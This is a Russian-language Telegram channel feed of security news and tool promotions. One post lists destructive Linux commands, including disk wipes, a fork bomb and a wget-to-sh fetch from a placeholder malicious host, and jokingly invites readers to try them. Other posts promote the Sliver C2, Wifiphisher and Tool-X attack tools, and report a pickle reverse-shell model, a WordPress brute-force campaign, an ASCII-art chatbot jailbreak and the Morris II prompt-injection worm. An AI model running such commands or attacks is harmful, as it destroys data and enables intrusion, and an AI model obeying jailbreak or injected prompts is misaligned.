Kali Linux
53.1K subscribers
1.03K photos
74 videos
13 files
1.08K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
👑 Подробная интерактивная карта ядра Linux

Карта: https://makelinux.github.io/kernel/map/
Исходное репо: https://github.com/makelinux/linux_kernel_map

#Linux #кибербезопасность

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
26🔥16👍8🥰2
🔥 Дайджест полезных материалов из мира Linux за неделю

Почитать:
Где изучать Linux в 2024. Бесплатные курсы, книги и ресурсы
Домашний сервер GameDev разработчика. Где найти железо?
Как расширить дисковое пространство на VPS за счет дисков на сервере в домашней сети
Установка Home Assistant на PC
OrangePi 5 с Proxmox 8
Большая шпаргалка по алгоритмам с собеседований.
12 лет спустя: Damn Small Linux снова в строю. По-прежнему быстрый, но изрядно «располневший»
— 10 лучших инструментов кэширования с открытым исходным кодом для Linux в 2024 году
Increase Swap Memory on Raspberry Pi
Lite Neovim Distro: A Blazing Fast, Lightweight Neovim Setup
Path Manager
Linux Reboot and shutdown commands
RIPE Atlas and Globalping: Choosing the Right Network Measurement Platform
新增aws-ubuntu服务器abc
How to install HP LaserJet 107a Drivers on Linux
Change screen input programatically on Linux
Linux Process Management - The Easy Way
Top 5 DevOps Engineer Interview Questions and Tips

Посмотреть:
🌐 Лучшие бесплатные курсы и книги по Python в 2024 год. ( 08:28)
🌐 Golang: Шпаргалка для алгособеса. Алгоритмы сортировки ( 19:18)
🌐 C# полный курс 2024. Урок 9 Циклы: For, break, continue. ( 06:00)
🌐 Is OpenAI's Sora any good? #shorts #ai #sora #youtube #video ( 00:59)
🌐 Why hack in when you can just log in? ( 22:25)
🌐 Snap Command Not Found Attack | Weekly News Roundup ( 12:21)
🌐 THIS is why AI will DESTROY us! | Tin Foil Hat Time ( 15:04)
🌐 Tails 6.0 Updates ( 22:36)
🌐 Gnome 46 OFFICE 365 Support - Good or Bad? ( 06:41)
🌐 Crazy New Biometric ID Cards ( 01:12:57)
🌐 Qubes Template VM Upgrades ( 12:44)
🌐 Signal Usernames and Privacy Fixes | Weekly News Roundup ( 34:55)

Хорошего дня!

@linuxkalii
👍143🔥2
🔝 Awesome Hacking

Кураторская коллекция полезных гайдов и инструментов для хакеров, пентестеров и исследователей безопасности.

Github

@linuxkalii
13👍6🔥3
⚡️ Большая шпаргалка по информационной безопасности

Полезный Api для хакинга
Эксплойты отсортированы по CVE
Инструменты командной строкаи
Сниппеты кода для различных языков
Теория Справочные знания по конкретным темам
Url Ресурсы в Интернете
и многое другое


📌 Github

#cybersecurity #infosec

@linuxkalii
👍164🥰3🔥2👎1🤔1
🔓 Лучшие платформы, где можно на практике отточить навыки пентеста.

🔵tryhackme
Обучение кибербезопасности в игровой форме, более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике

🔵bWAPP
Содержит около 100 уязвимостей, классифицированных по топ-10 от OWASP. Предназначается для поиска и эксплуатации уязвимостей в веб-приложениях и не только. Это PHP приложение, использующее MYSQL.

🔵OWASP Juice Shop
Веб-приложение с уязвимостями, созданное для целей обучения безопасности, написанное на JavaScript. Оно буквально набито проблемами разных уровней сложности, предназначенными для их эксплуатации пользователем.

🔵Hack Me
Главное в Hack Me — использовать вашу командную строку, SQL-инжекторы, чистильщик логов и прочие программы для взлома серверов.

🔵HackTheBox
Популярная площадка для практики взлома, маст-хев для тех, кто изучает этичный хакинг и информационную безопасностью.

🔵Root-Me
С помощью Root-Me мы узнаем основы дизассемблирования, решим задачи начального уровня реверса и ещё множество других хакерских задач

🔵XSS Game
Эта игра покажет как выявлять XSS, это знание поможет вам предотвращать ошибки в ваших приложениях. В игре несколько уровней, в случае затруднения можно воспользоваться подсказками.

🔵Pentesterlab
Платформа, которая предоставляет как онлайн, так и оффлайн лаборатории, предназначенные для обучения искусству пентестинга веб-приложений и веб-безопасности. Сайт предлагает ряд бесплатных упражнений и подписной пакет PRO, который дает доступ к более чем 200 частным упражнениям.

🔵Hacking Lab
Онлайн платформа для изучения сетевой безопасности и повышения навыков этичного хакинга. Содержит задания, приближенные к CTF: форензика, криптография, реверс-инжиниринг.

🔵IO
Варгейм от создателей netgarage.org, сообщества, в котором единомышленники делятся знаниями о безопасности, искусственном интеллекте, VR и многом другом.

🔵SmashTheStack
SmashTheStack состоит из 7 различных варгеймов: Amateria, Apfel (в настоящее время офлайн), Blackbox, Blowfish, CTF (в настоящее время офлайн), Logic и Tux. Каждый варгейм содержит множество задач, начиная от стандартных уязвимостей и заканчивая задачами на реверс-инжиниринг.

🔵Microcorruption
Это embedded CTF, в котором вам предоставляется отладчик и устройство (умный замок).

🔵Hax.Tor
Довольно увлекательный хак-квест.

🔵Pwnos
Создатель pWnOS решил не ограничиваться только веб-приложениями и решил выпустить на основе виртуальной машины уязвимую систему, поставив перед тобой задачу «получи root'а». Легенда следующая: тебя, как пентестера, нанимают для изучения защищенности одного из выделенных серверов. Вот тут и начинается игра: поиск живых хостов nmap'ом, поиск уязвимых сервисов, получение сертификатов для доступа по SSH, поиск локальных сплоитов и так далее — короче, рай для новичков.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25👍199
💻 Sliver C2

Это фреймворк Red Team с открытым исходным кодом, разработанный компанией BishopFox, занимающейся кибербезопасностью, и представляет собой кроссплатформенную среду постэксплуатации на основе Golang.

Он используется для выполнения второго этапа выполнения цепочки атак на внутреннюю сеть (когда компьютер жертвы уже был скомпрометирован доступными способами) и является альтернативой такого коммерческого инструмента как CobaltStrike, как утверждают сами производители.

Архитектура Sliver C2 состоит из трёх частей:
Сервер Sliver C2 является частью исполняемого файла sliver-server, управляет внутренней базой данных, а также запускает и останавливает сетевые прослушиватели. Основным интерфейсом взаимодействия с сервером является интерфейс gRPC, через него реализуются все функции.

Клиентская консоль — это основной пользовательский интерфейс для взаимодействия с сервером Sliver C2.

Импланты — это вредоносный код, нагрузка, (exe, ps1 и т. д.), запускаемая в целевой системе. Взаимосвязь и форму взаимодействия каждой части можно показать следующим образом:

Github
Узнать подробнее

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍186🔥2
🎉🎉🎉 Вышел Kali Linux 2024.1: релиз содержит инновации в области кибербезопасности с улучшенной сетью зеркал, обновленным дизайном и сильно расширенными функциями NetHunter 🎉🎉🎉

Kali Linux 2024.1 вводит ряд новых инструментов и улучшений для существующих, включая blue-hydra для обнаружения Bluetooth-устройств и opentaxii как реализацию сервера TAXII, а также ряд обновлений для системы обнаружения вторжений snort.

Основанная на ядре Linux 6.6, новая версия дистрибутива делает акцнт на внедрение Micro Mirror Free Software CDN, что значительно улучшая сеть распространения Kali Linux. Этот шаг поможет оптимизации хранения и обеспечение бесперебойного доступа к проектам с высоким уровнем трафика.

Новые крутые инструменты, которые добавили в Kali Linux 2024.1:

blue-hydra —новые инструменты для обнаружения Bluetooth-устройств;
opentaxii — имплементация сервера TAXII от EclecticIQ;
readpe — инструменты командной строки для управления файлами Windows PE;
snort — мощная система обнаружения вторжений по сети.

📌 Релиз

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍50🔥138
⚡️Держите, самые полезные поисковики для пентестера и не только

Разведка угроз:
app.binaryedge.ioviz.greynoise.iofofa.info
zoomeye.orgleakix.neturlscan.io
socradar.iopulsedive.com

Поиск кода:
grep.appsearchcode.compublicwww.com

Поиск серверов:
shodan.ioonyphe.iocensys.io
ivre.rocks

Обнаружение поверхности атаки:
app.netlas.iofullhunt.iobinaryedge.io

OSINT — intelx.io
поиск email — hunter.io
поиск точек Wi-Fi — wigle.net
поиск сертификатов — crt.sh
поиск уязвимостей — vulners.com

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍358🔥5
💻 Вредоносные Deep Learning модели

На платформе Hugging Face обнаружено не менее 100 вредоносных Deep Learning моделей, некоторые из которых могут выполнять код на машине жертвы, предоставляя злоумышленникам постоянный бэкдор.

Специалисты компании JFrog разработали и развернули продвинутую систему сканирования для проверки моделей PyTorch и Tensorflow Keras, размещенных на Hugging Face.
Малварь проникла в Hugging Face несмотря на все меры безопасности, включая сканирование на наличие малвари, а также тщательное изучение функциональности моделей для обнаружения такого поведения, как небезопасная десериализация.

Одним из примеров стала модель PyTorch, загруженная недавно пользователем под ником baller423 и уже удаленная с HuggingFace. Она содержала полезную нагрузку, которая позволяла создать реверс-шелл на указанный хост (210.117.212.93). Вредоносная полезная нагрузка использовала метод __reduce__ модуля pickle для выполнения произвольного кода при загрузке файла модели PyTorch, при этом избегая обнаружения за счет встраивания малвари в доверенный процесс сериализации.

В JFrog обнаружили, что та же полезная нагрузка связывалась и с другими IP-адресами, что позволяет предположить, что ее операторы все же являются ИИ- и ИБ-исследователями, а не хакерами. Однако такие эксперименты в JFrog все равно называют слишком рискованными, учитывая, что опасные модели были общедоступны.

Пытаясь определить истинные намерения операторов вредоноса, аналитики развернули приманку для привлечения активности и ее анализа. Им удалось установить соединение с сервером потенциальных злоумышленников, однако не удалось перехватить ни одной команды за время поддержания соединения.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
17👍11🔥6🎉2
💻 Tool-X — набор из 370 инструментов Kali Linux

apt update
apt install git
git clone https://github.com/rajkumardusad/Tool-X.git
cd Tool-X
chmod +x install
sh install if not work than use ./install

Tool-X содержит инструменты для:
├── сбора информации
├── сканирования уязвимостей
├── инструменты эксплойта
├── тестирование беспроводных сетей
├── инструменты форензики
└── инструменты для DDOS

и ещё много всего интересного, не благодарите)

🖥 GitHub

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍569🔥7🤔1
🥷 Как хакнуть GPT

Исследователи раскрыли хак, как убрать из ChatGPT цензуру и заставить ИИ отвечать без ограничений со стороны разработчиков. Оказалось. что для этого нужно просто замаскировать запрос под арт ASCII.

После этого ChatGPT может сообщить различные ранее запрещённые для раскрытия инструкции и заблокированную информацию. Этот баг есть во всех популярных нейросетях — GPT-3.5, GPT-4, Gemini, Claude и Llama2.

¯\_(ツ)_/¯

@linuxkalii
🔥50👍174👎3🤬1
💻 Атака KeyTrap позволяет вывести из строя DNS-сервер

Группа немецких исследователей обнаружила уязвимость в DNSSEC — наборе расширений протокола DNS, которые предназначены для повышения его безопасности.
Атака KeyTrap, эксплуатирующая эту уязвимость, позволяет вывести из строя DNS-сервер, отправив ему 1 вредоносный пакет данных.


🗄Как работает атака KeyTrap
Уязвимость в DNSSEC была обнаружена пару месяцев назад и зарегистрирована как CVE-2023-50387. Ей присвоена оценка 7,5 по шкале CVSS 3.1 и уровень опасности «высокий».

Суть KeyTrap. Атакующий создает DNS-сервер, отвечающий на запросы кэширующих DNS-серверов вредоносным пакетом. Далее злоумышленник заставляет кэширующий сервер запросить DNS-запись у вредоносного DNS-сервера, который в ответ отправляет криптографически подписанную вредоносную DNS-запись. Подпись выполнена таким образом, что в процессе ее проверки атакуемый DNS-сервер зависает с загрузкой процессора 100%.

В зависимости от ПО на DNS-сервере, эта атака может заставить сервер зависнуть на срок до 16 часов. Атака KeyTrap может не только лишить доступа к веб-контенту всех клиентов DNS-сервера, но и помешать работе различных инфраструктурных сервисов, таких как защита от спама, обработка цифровых сертификатов (PKI) и безопасная междоменная маршрутизация (RPKI).

KeyTrap называют «самой серьезной из атак на DNS-серверы». Интересно, что изъяны в логике проверки подписи, которые делают эту атаку возможной, обнаружены еще в одной из самых ранних версий спецификации DNSSEC, опубликованной аж в 1999 году.


🗄Защита от KeyTrap
Исследователи уведомили всех разработчиков программного обеспечения для DNS-серверов и крупнейших публичных DNS-провайдеров. Закрывающие уязвимость CVE-2023-50387 обновления и рекомендации по безопасности уже доступны для PowerDNS, NLnet Labs Unbound и Internet Systems Consortium BIND9. Так что если вы администрируете DNS-сервер, самое время накатить обновления.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
22👍7🔥6😱4
💻 Wifiphisher — мощный инструмент Kali

Wifiphisher — это инструмент для создания ложной точки доступа; предназначен для RedTeam или тестирования безопасности Wi-Fi.
С помощью Wifiphisher пентестеры могут легко устроить MITM против беспроводных клиентов, выполняя направленные атаки Wi-Fi.
Wifiphisher также может использоваться для организации фишинговых атак, настраиваемых для жертвы, для захвата учетных данных подключенных клиентов (например, со страниц входа сторонних сервисов или предустановленных ключей WPA/WPA2) или для инфицирования жертвы вредоносным программным обеспечением.

Фичи Wifiphisher
🗄мощный. Wifiphisher может работать в течение часов внутри устройства Raspberry Pi, выполняя все современные техники (включая "Evil Twin", "KARMA" и "Known Beacons")

🗄гибкий. Имеет десятки параметров и поставляется с набором шаблонов фишинга, для различных сценариев использования.

🗄модульный. Пользователи могут писать скрипты на Python для расширения функциональности инструмента или создания настраиваемых сценариев для проведения конкретных целевых атак.

🗄легкий в использовании. Продвинутые пользователи могут воспользоваться богатым набором функций, предлагаемых Wifiphisher, но начинающие могут начать, просто запустив команду ./bin/wifiphisher. Интерактивный текстовый пользовательский интерфейс помогает удобно настраивать атаку.

🗄основан на результатах обширных исследований. Атаки, такие как "Known Beacons" и "Lure10", а также современные техники фишинга были раскрыты разработчиками Wifiphisher, которые и добавили в него эти новые возможности

🗄поддерживается отличным сообществом разработчиков и пользователей и бесплатный — что всегда приятно

Пользуйтесь на здоровье)

🖥 GitHub
📁 Доки

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍469🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
😂 Хакерство из фильмов.

Взломщик показал, как взламывает светофоры с помощью девайса Flipper Zero и теперь всегда может ехать «на зелёный».

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥70😁349👎8👍6👏1
💻 Массовые аттаки на сайты WordPress

Sucuri предупреждает, что хакеры проводят атаки на сайты под управлением WordPress и внедряют скрипты, которые заставляют брутфорсить пароли для других сайтов.

Стоящие за этим хакеры обычно взламывают сайты, чтобы внедрять на них скрипты для угона криптокошельков. Их скрипты отображают мошеннические сообщения. Если человек попадается, скрипты похищают все активы в его кошельке.

Обычно хакеры использовали сайты на WordPress, внедряя на них AngelDrainer. Атаки осуществлялись несколькими волнами с различных URL, последним был dynamiclink[.]lol/cachingjs/turboturbo.js.

Однако теперь мошенники используют браузеры посетителей для брутфорса других WordPress-сайтов, применяя для этого вредоносный скрипт с недавно зарегистрированного домена dynamic-linx[.]com/chx.js.

То есть злоумышленники взламывают сайт под управлением WordPress и внедряют в его HTML-шаблоны вредоносный код. Когда посетители заходят на такой сайт, в их браузер загружаются скрипты с https://dynamic-linx[.]com/chx.js.

Эти скрипты вынуждают браузеры жертв связываться с сервером хакеров (https://dynamic-linx[.]com/getTask.php) и получать задание на перебор паролей. Оно поставляется в виде JSON-файла, содержащего необходимые параметры для атаки: ID, URL сайта, имя учетной записи, число, обозначающее текущую партию паролей для перебора, а также сто паролей для пробы.

При получении задания браузер жертвы загружает файл через XMLRPC-интерфейс WordPress, используя имя учетной записи и пароль из JSON. Если пароль подобран правильно, скрипт уведомит своих операторов о том, что пароль для сайта найден.

По данным PublicHTML, в настоящее время такими скриптами заражены более 1700 сайтов. К примеру, в числе взломанных ресурсов можно найти даже сайт Ассоциации частных банков Эквадора.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍46🔥65😁2🤔2
🔥Подборка лучших обучающих каналов для программистов.

➡️ Делитесь с коллегами и cохраняйте себе, чтобы не потерять

⚡️ Frontend
Javascript академия - крупнейший js канал
React - лучшие гайды и советы по работе с react
Frontend - тутрориалы, уроки, гайды, код
PHP
Книги frontend
Задачи frontend

💥 Хакинг Kali Linux

Kali linux
linux_kal - kali чат
Информационная безопасность

🚀 Data Science

Анализ данных - полезные фишки, код, гайды и советы, маст-хэв датасаентиста
Data Jobs - ds вакансии
Аналитик данных
Data Science книги - актуальные бесплатные книги
Big data

#️⃣C#

С# академия
С# заметки — код, лучшие практики, заметки программиста c#
С# задачи и тесты
С# библиотека - актуальные бесплатные книги
C# вакансии - работа

Машинное обучение

Ml Собеседование - подготовка к собеседовению мл, алгоритмам, кодингу
Ml ru - актуальные статьи, новости, код и обучающие материалы
Ml Jobs - вакансии ML
ML Книги - актуальные бесплатные книги МО
ML чат
Machine Learning - полезные статьи новости гайды и разбор кода

🏆 Golang
Golang - подробные гайды, разбор кода, лучшие практики, заметки
Golang собеседование
Golang вакансии
Golang книги
Golang задачи и тесты
Golang чат
Golang news - новости go

🐍 Python

Python/django
Python Собеседование - подготовка к собеседовению python и разбор алгоритмов
Pro python - статьи, новости, код и обучающие материалы
Python Jobs - вакансии Python
Python чат
Python книги

Java

Java академия
Java вакансии
Java чат
Java вопросы с собеседований
Java книги

🛢Базы данных
Sql базы данных
Библиотека баз данных
SQL чат

💻 C++

C++ академия
С++ книги
C++ задачи - подготовка к собеседовению мл, алгоритмам
C++ вакансии

🐧 Linux

Linux academy

🦀 Rust
Rust программирование
Rust чат
Rust книги для программистов

📲 Мобильная разработка
Android разработка
Мобильный разработчик гайды и уроки

🇬🇧 Английский для программистов

🧠 Искусственный интеллект
ИИ и технологии
Neural - нейросети для работы и жизни
Книги ИИ
Artificial Intelligence

🔥 DevOPs
Devops для программистов
Книги Devops

🌟 Docker/Kubernets
Docker
Kubernets

📓 Книги
Библиотеки Книг для программситов

💼 Папка с вакансиями:
Папка Go разработчика:
Папка Python разработчика:
Папка Data Science
Папка Java разработчика
Папка C#
Папка Frontend
👍245🔥5
💻 Никогда не запускай эти 10+ команд Linux

Обожаю Linux за его гибкость и безграничные возможности)

🗄rm -rf / – Эта команда удалит все файлы и папки на вашем компьютере.

🗄:(){ :|: & };: – Это команда, также известная как "fork bomb", может вызвать переполнение памяти на вашем компьютере и привести к аварийному завершению системы.

🗄mkfs.ext4 /dev/sda – Эта команда форматирует жесткий диск без какого-либо предупреждения или подтверждения. Все данные будут утеряны.

🗄dd if=/dev/random of=/dev/sda – Эта команда перезапишет все данные на жестком диске случайными значениями, что приведет к потере данных.

🗄chmod 777 / – Эта команда откроет полный доступ к вашей файловой системе для всех пользователей, что может привести к нарушению безопасности.

🗄mv /home/* /dev/null – Эта команда переместит все файлы в вашей домашней директории в "null", короче, они будут утеряны.

🗄wget http://example.com/file -O /dev/null – Эта команда загрузит файл и перезапишет все данные в "null", что приведет к потере данных.

🗄mkfs.ext4 /dev/sda1 – Эта команда форматирует раздел жесткого диска без какого-либо предупреждения или подтверждения. Все данные на этом разделе будут утеряны.

🗄ln -s /dev/null /etc/passwd – Эта команда создаст символическую ссылку на "/etc/passwd" в "null", что приведет к потере данных.

🗄echo "Hello" > /dev/sda – это заменит ваш раздел, содержащий все данные, необходимые для загрузки системы, строкой «Hello».

🗄wget http://malicious_source -O- | sh – Такие команды будут загружать и запускать в вашей системе вредоносные сценарии, которые могут подорвать безопасность вашей системы.

В общем, берите ненужный комп — и да начнётся веселье

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍58🔥2011👎2
🚀 Cybersecurity for Beginners – a curriculum

Microsoft выпустила крутейший курс. Совешенно бесплатно Security-101 для изучения основ кибербезопасности.

Он подойдёт всем, кто желает ознакомиться с базовыми принципами защиты от киберугроз.

Всего доступно семь уроков со статьями, видео и дополнительными материалами.

📌 Курс

@linuxkalii
👍32🔥93
Social engineering books - книги по хакингу и информационной безопасностb

Linux academy - лайхаки, полезные инструменты для работы с linux

Linux books - полезные и актуальные книги о Linux.

Вакансии сетевого администратора
👍186🔥2
💻 Нейросетевой червь —
— новая гроза почтовых клиентов с AI-фичами


Группа исследователей из Израильского технологического института и компании Intuit разработали червя Morris II, который заточен на атаки нейросетевых приложений и почтовых клиентов с поддержкой нейросетевых функций. Morris II способен красть личные данные, внедрять вредоносное ПО, спамить пользователей и распространяться через несколько связанных сервисов.

Исследование демонстрирует, что злоумышленники могут использовать запросы (например, в обычном письме), которые при обработке генеративной нейросетью заставляют её воспроизводить входные данные в качестве выходных и совершать вредоносные действия. Червь был протестирован против трёх различных моделей — Gemini Pro, ChatGPT 4.0 и LLaVA, а также оценены различные факторы (например, скорость распространения, репликация, вредоносная активность), влияющие на его эффективность.

В данный момент речь идёт о научном исследовании в искусственно созданной среде, и, по словам авторов, пока нет признаков того, что подобные черви уже действуют в интернете, но это лишь вопрос времени. Команда сообщила о своих результатах в Google и OpenAI.

📎 Подробнее можно почитать тут

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍173🔥3😁2